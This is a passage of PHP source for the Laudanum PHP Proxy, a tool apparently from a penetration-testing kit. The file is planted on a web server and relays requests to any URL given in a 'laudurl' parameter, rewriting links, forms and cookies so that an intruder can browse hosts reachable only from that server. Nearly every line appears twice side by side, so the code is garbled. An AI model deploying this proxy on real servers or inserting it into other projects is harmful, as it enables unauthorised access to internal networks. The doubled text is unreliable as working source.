Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/> Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/> Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>. Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address> </address>
</body> </body>
</html>'); </html>');
} }
} }
set_error_handler('error_handler'); set_error_handler('error_handler');
function geturlarray($u) { function geturlarray($u) {
// creates the url array, addes a scheme if it is missing and retries parsing // creates the url array, addes a scheme if it is missing and retries parsing
$o = parse_url($u); $o = parse_url($u);
if (!isset($o["scheme"])) { $o = parse_url("http://" . $u); } if (!isset($o["scheme"])) { $o = parse_url("http://" . $u); }
if (!isset($o["path"])) { $o["path"] = "/"; } if (!isset($o["path"])) { $o["path"] = "/"; }
return $o; return $o;
} }
function buildurl ($u) { function buildurl ($u) {
// build the url from the url array // build the url from the url array
// this is used because the built in function isn't // this is used because the built in function isn't
// avilable in all installs of php // avilable in all installs of php
if (!isset($u["host"])) { return null; } if (!isset($u["host"])) { return null; }
$s = isset($u["scheme"]) ? $u["scheme"] : "http"; $s = isset($u["scheme"]) ? $u["scheme"] : "http";
$s .= "://" . $u["host"]; $s .= "://" . $u["host"];
$s .= isset($u["port"]) ? ":" . $u["port"] : ""; $s .= isset($u["port"]) ? ":" . $u["port"] : "";
$s .= isset($u["path"]) ? $u["path"] : "/"; $s .= isset($u["path"]) ? $u["path"] : "/";
$s .= isset($u["query"]) ? "?" . $u["query"] : ""; $s .= isset($u["query"]) ? "?" . $u["query"] : "";
$s .= isset($u["fragment"]) ? "#" . $u["fragment"] : ""; $s .= isset($u["fragment"]) ? "#" . $u["fragment"] : "";
return $s; return $s;
} }
function buildurlpath ($u) { function buildurlpath ($u) {
//gets the full url and attempts to remove the file at the end of the url //gets the full url and attempts to remove the file at the end of the url
// e.g. http://blah.com/dir/file.ext => http://blah.com/dir/ // e.g. http://blah.com/dir/file.ext => http://blah.com/dir/
if (!isset($u["host"])) { return null; } if (!isset($u["host"])) { return null; }
$s = isset($u["scheme"])? $u["scheme"] : "http"; $s = isset($u["scheme"])? $u["scheme"] : "http";
$s .= "://" . $u["host"]; $s .= "://" . $u["host"];
$s .= isset($u["port"]) ? ":" . $u["port"] : ""; $s .= isset($u["port"]) ? ":" . $u["port"] : "";
$path = isset($u["path"]) ? $u["path"] : "/"; $path = isset($u["path"]) ? $u["path"] : "/";
// is the last portion of the path a file or a dir? // is the last portion of the path a file or a dir?
// assume if there is a . it is a file // assume if there is a . it is a file
// if it ends in a / then it is a dir // if it ends in a / then it is a dir
// if neither, than assume dir // if neither, than assume dir
$dirs = explode("/", $path); $dirs = explode("/", $path);
$last = $dirs[count($dirs) - 1]; $last = $dirs[count($dirs) - 1];
if (preg_match('/\./', $last) || !preg_match('/\/$/', $last)) { if (preg_match('/\./', $last) || !preg_match('/\/$/', $last)) {
// its a file, remove the last chunk // its a file, remove the last chunk
$path = substr($path, 0, -1 * strlen($last)); $path = substr($path, 0, -1 * strlen($last));
} }
$s .= $path; $s .= $path;
return $s; return $s;
} }
function getfilename ($u) { function getfilename ($u) {
// returns the file name // returns the file name
// e.g. http://blah.com/dir/file.ext returns file.ext // e.g. http://blah.com/dir/file.ext returns file.ext
// technically, it is the last portion of the url, so there is a potential // technically, it is the last portion of the url, so there is a potential
// for a problem if a http://blah.com/dir returns a file // for a problem if a http://blah.com/dir returns a file
$s = explode("/", $u["path"]); $s = explode("/", $u["path"]);
return $s[count($s) - 1]; return $s[count($s) - 1];
} }
function getcontenttype ($headers) { function getcontenttype ($headers) {
// gets the content type // gets the content type
foreach($headers as $h) { foreach($headers as $h) {
if (preg_match_all("/^Content-Type: (.*)$/", $h, $out)) { if (preg_match_all("/^Content-Type: (.*)$/", $h, $out)) {
return $out[1][0]; return $out[1][0];
} }
} }
} }
function getcontentencoding ($headers) { function getcontentencoding ($headers) {
foreach ($headers as $h) { foreach ($headers as $h) {
if (preg_match_all("/^Content-Encoding: (.*)$/", $h, $out)) { if (preg_match_all("/^Content-Encoding: (.*)$/", $h, $out)) {
return $out[1][0]; return $out[1][0];
} }
} }
} }
function removeheader($header, $headers) { function removeheader($header, $headers) {
foreach (array_keys($headers) as $key) { foreach (array_keys($headers) as $key) {
if (preg_match_all("/^" . $header . ": (.*)$/", $headers[$key], $out)) { if (preg_match_all("/^" . $header . ": (.*)$/", $headers[$key], $out)) {
unset($headers[$key]); unset($headers[$key]);
return $headers; return $headers;
} }
} }
} }
function rewritecookies($headers) { function rewritecookies($headers) {
// removes the path and domain from cookies // removes the path and domain from cookies
for ($i = 0; $i < count($headers); $i++) { for ($i = 0; $i < count($headers); $i++) {
if (preg_match_all("/^Set-Cookie:/", $headers[$i], $out)) { if (preg_match_all("/^Set-Cookie:/", $headers[$i], $out)) {
$headers[$i] = preg_replace("/domain=[^[:space:]]+/", "", $headers[$i]); $headers[$i] = preg_replace("/domain=[^[:space:]]+/", "", $headers[$i]);
$headers[$i] = preg_replace("/path=[^[:space:]]+/", "", $headers[$i]); $headers[$i] = preg_replace("/path=[^[:space:]]+/", "", $headers[$i]);
} }
} }
return $headers; return $headers;
} }
function getsessionid($headers) { function getsessionid($headers) {
for ($i = 0; $i < count($headers); $i++) { for ($i = 0; $i < count($headers); $i++) {
if (preg_match_all("/^Set-Cookie: SessionID=([a-zA-Z0-9]+);/", $headers[$i], $out)) if (preg_match_all("/^Set-Cookie: SessionID=([a-zA-Z0-9]+);/", $headers[$i], $out))
return $out[1][0]; return $out[1][0];
} }
return "0"; return "0";
} }
function compatible_gzinflate($gzData) { function compatible_gzinflate($gzData) {
if ( substr($gzData, 0, 3) == "\x1f\x8b\x08" ) { if ( substr($gzData, 0, 3) == "\x1f\x8b\x08" ) {
$i = 10; $i = 10;
$flg = ord( substr($gzData, 3, 1) ); $flg = ord( substr($gzData, 3, 1) );
if ( $flg > 0 ) { if ( $flg > 0 ) {
if ( $flg & 4 ) { if ( $flg & 4 ) {
list($xlen) = unpack('v', substr($gzData, $i, 2) ); list($xlen) = unpack('v', substr($gzData, $i, 2) );
$i = $i + 2 + $xlen; $i = $i + 2 + $xlen;
} }
if ( $flg & 8 ) if ( $flg & 8 )
$i = strpos($gzData, "\0", $i) + 1; $i = strpos($gzData, "\0", $i) + 1;
if ( $flg & 16 ) if ( $flg & 16 )
$i = strpos($gzData, "\0", $i) + 1; $i = strpos($gzData, "\0", $i) + 1;
if ( $flg & 2 ) if ( $flg & 2 )
$i = $i + 2; $i = $i + 2;
} }
return @gzinflate( substr($gzData, $i, -8) ); return @gzinflate( substr($gzData, $i, -8) );
} else { } else {
return false; return false;
} }
return false; return false;
} }
function rewrite ($d, $u) { function rewrite ($d, $u) {
$r = $d; $r = $d;
//rewrite images and links - absolute reference //rewrite images and links - absolute reference
$r = preg_replace("/((src|href).?=.?['\"]?)(\/[^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . $u["scheme"] . "://" . $u["host"] . "\\3", $r); $r = preg_replace("/((src|href).?=.?['\"]?)(\/[^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . $u["scheme"] . "://" . $u["host"] . "\\3", $r);
//rewrite images and links - hard linked //rewrite images and links - hard linked
$r = preg_replace("/((src|href).?=.?['\"])(http[^'\"]+['\"])/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . "\\3", $r); $r = preg_replace("/((src|href).?=.?['\"])(http[^'\"]+['\"])/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . "\\3", $r);
//rewrite images and links - relative reference //rewrite images and links - relative reference
$r = preg_replace("/((src|href).?=.?['\"])([^\/][^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . buildurlpath($u) . "\\3", $r); $r = preg_replace("/((src|href).?=.?['\"])([^\/][^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . buildurlpath($u) . "\\3", $r);
//rewrite form - absolute reference //rewrite form - absolute reference
$r = preg_replace("/(<form(.+?)action.?=.?['\"])(\/[^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . $u["scheme"] . "://" . $u["host"] . "\\3\">", $r); $r = preg_replace("/(<form(.+?)action.?=.?['\"])(\/[^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . $u["scheme"] . "://" . $u["host"] . "\\3\">", $r);
//rewrite form - hard linked //rewrite form - hard linked
$r = preg_replace("/(<form(.+?)action.?=.?['\"])(http[^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . "\\3\">", $r); $r = preg_replace("/(<form(.+?)action.?=.?['\"])(http[^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . "\\3\">", $r);
//rewrite form - relative reference //rewrite form - relative reference
$r = preg_replace("/(<form(.+?)action.?=.?['\"])([^\/][^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . buildurlpath($u) . "\\3\">", $r); $r = preg_replace("/(<form(.+?)action.?=.?['\"])([^\/][^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . buildurlpath($u) . "\\3\">", $r);
return $r; return $r;
} }
/* Initialize some variables we need again and again. */ /* Initialize some variables we need again and again. */
$url = isset($_GET["laudurl"]) ? $_GET["laudurl"] : ""; $url = isset($_GET["laudurl"]) ? $_GET["laudurl"] : "";
if ($url == "") { if ($url == "") {
$url = isset($_POST["laudurl"]) ? $_POST["laudurl"] : ""; $url = isset($_POST["laudurl"]) ? $_POST["laudurl"] : "";
} }
if ($url == "") { if ($url == "") {
?> ?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd"> "http://www.w3.org/TR/html4/strict.dtd">
<html> <html>
<head> <head>
<title>Laudanum PHP Proxy</title> <title>Laudanum PHP Proxy</title>
<link rel="stylesheet" href="style.css" type="text/css"> <link rel="stylesheet" href="style.css" type="text/css">
<script type="text/javascript"> <script type="text/javascript">
function init() { function init() {
document.proxy.url.focus(); document.proxy.url.focus();
} }
</script> </script>
</head> </head>
<body onload="init()"> <body onload="init()">
<h1>Laudanum PHP Proxy</h1> <h1>Laudanum PHP Proxy</h1>
<form method="GET" name="proxy"> <form method="GET" name="proxy">
<input type="text" name="laudurl" size="70"> <input type="text" name="laudurl" size="70">
</form> </form>
<hr> <hr>
<address> <address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/> Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/> Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>. Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address> </address>
</body> </body>
</html> </html>
<?php <?php
} else { } else {
$url_c = geturlarray($url); $url_c = geturlarray($url);
$params = array_merge($_GET, $_POST); $params = array_merge($_GET, $_POST);
//don't pass throught the parameter we are using //don't pass throught the parameter we are using
unset($params["laudurl"]); unset($params["laudurl"]);
//create the query or post parameters //create the query or post parameters
$query = http_build_query($params); $query = http_build_query($params);
if ($query != "") { if ($query != "") {
$url_c["query"] = $query; $url_c["query"] = $query;
} }
//get the files //get the files
$fp = fopen(buildurl($url_c), "rb"); $fp = fopen(buildurl($url_c), "rb");
// use the headers, except the response code which is popped off the array // use the headers, except the response code which is popped off the array
$headers = $http_response_header; $headers = $http_response_header;
// pop // pop
array_shift($headers); array_shift($headers);
// fix cookies // fix cookies
$headers = rewritecookies($headers); $headers = rewritecookies($headers);
$ctype = getcontenttype($headers); $ctype = getcontenttype($headers);
$cencoding = getcontentencoding($headers); $cencoding = getcontentencoding($headers);
// we will remove gzip encoding later, but we need to remove the header now // we will remove gzip encoding later, but we need to remove the header now
// before it is added to the response. // before it is added to the response.
if ($cencoding == "gzip") if ($cencoding == "gzip")
$headers = removeheader("Content-Encoding", $headers); $headers = removeheader("Content-Encoding", $headers);
// set headers for response to client // set headers for response to client
if (preg_match("/text|image/", $ctype)) { if (preg_match("/text|image/", $ctype)) {
header_remove(); header_remove();
// the number of headers can change due to replacement // the number of headers can change due to replacement
$i = 0; $i = 0;
while ($i < count($headers)) { while ($i < count($headers)) {
if (strpos($headers[$i], "Set-Cookie:") == false) if (strpos($headers[$i], "Set-Cookie:") == false)
// replace headers // replace headers
header($headers[$i], true); header($headers[$i], true);
else else
// if it is the first cookie, replace all the others. Otherwise add // if it is the first cookie, replace all the others. Otherwise add
header($headers[$i], false); header($headers[$i], false);
$i++; $i++;
} }
} else { } else {
header("Content-Disposition: attachment; filename=" . getfilename($url_c)); header("Content-Disposition: attachment; filename=" . getfilename($url_c));
} }
// get data // get data
if (preg_match("/text/",$ctype)) { //text if (preg_match("/text/",$ctype)) { //text
//it is a text format: html, css, js //it is a text format: html, css, js
$data = ""; $data = "";
while (!feof($fp)) { while (!feof($fp)) {
$data .= fgets($fp, 4096); $data .= fgets($fp, 4096);
} }
// uncompress it so it can be rewritten // uncompress it so it can be rewritten
if ($cencoding == "gzip") if ($cencoding == "gzip")
$data = compatible_gzinflate($data); $data = compatible_gzinflate($data);
// rewrite all the links and such // rewrite all the links and such
echo rewrite($data, $url_c); echo rewrite($data, $url_c);
} else { } else {
// binary format or something similar, let it go through // binary format or something similar, let it go through
fpassthru($fp); fpassthru($fp);
fclose($fp); fclose($fp);
} }
} }
?> ?>